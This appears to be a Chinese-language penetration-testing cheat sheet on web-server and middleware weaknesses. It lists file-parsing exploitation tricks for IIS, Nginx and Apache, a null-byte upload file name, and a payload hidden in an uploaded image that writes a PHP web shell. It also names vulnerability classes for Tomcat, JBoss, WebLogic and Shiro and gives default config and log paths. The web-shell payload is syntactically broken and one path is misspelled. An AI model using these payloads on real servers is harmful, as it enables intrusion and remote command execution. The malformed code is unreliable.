<aside> 💡 Notion Tip: 服务器/中间件安全.

</aside>

常见中间件

• IIS、Apache、nginx、Lighttpd、Tomcat

常见的中间件解析漏洞利用方式

• IIS 6.0
  • /xx.asp/xx.jpg，"xx.asp"是文件夹名
  • xx.asp;.jsp，
• IIS 7.0/7.5
  • 默认Fast-CGI开启，直接在url中图片地址后输入/1.php，会把正常图片当成php解析
  • 上传sp.jpg，内容:<?PHP fputs(fopen('shell.php'),'w'),'<?php eval()$_POST[cmd]?>');'?>
  • 访问sp.jpg/.php，就会生成shell.php
• Nginx
  • 版本≤0.8.37，利用方法和IIS 7.0/7.5一样，Fast-CGI关闭也可以利用
  • 空字节代码：xxx.jpg%00.php
• Apache
  • 上传的文件命名为：test.php.x1.x2.x3，Apache是从右往左判断后缀

IIS：PUT漏洞、短文件名猜解、远程代码执行、解析漏洞
Apache：解析漏洞、目录遍历
Nginx：文件解析、目录遍历、CRLF注入、目录穿越
Tomcat：远程代码执行、war后门文件部署
JBoss：反序列化漏洞、war后门文件部署
WebLogic：反序列化漏洞、SSRF任意文件上传、war后门文件部署
ApacheShiro反序列化漏洞：ShirorememberMe（Shiro-550）、ShiroPaddingOracleAttack(Shiro-721)

中间件默认配置文件路径

• Apache
  • /etc/httpd/conf/
• Nginx
  • /etc/nginx
• IIS
  • IIS 5
    • C:\\WINNT\\system32\\inetsrv\\MetaBase.bin
  • IIS 6
    • C:\\WINDOWS\\system32\\inetsrv\\MetaBase.xml
  • IIS 7
    • C:\\WINDOWS\\system32\\inetstr\\config\\applicationHost.config

中间件默认log文件

• Apache
  • /var/log/apache2/access.log
  • /var/log/apache2/error.log
• Nginx
  • /var/log/nginx/access.log
  • /var/log/nginx/error.log
• IIS（IIS版本和WinServer版本不同，日志路径也不同）
  • %windir%\\System32\\LogFiles
  • %SystemDrive%\\inetpub\\logs\\LogFiles

控制台默认地址密码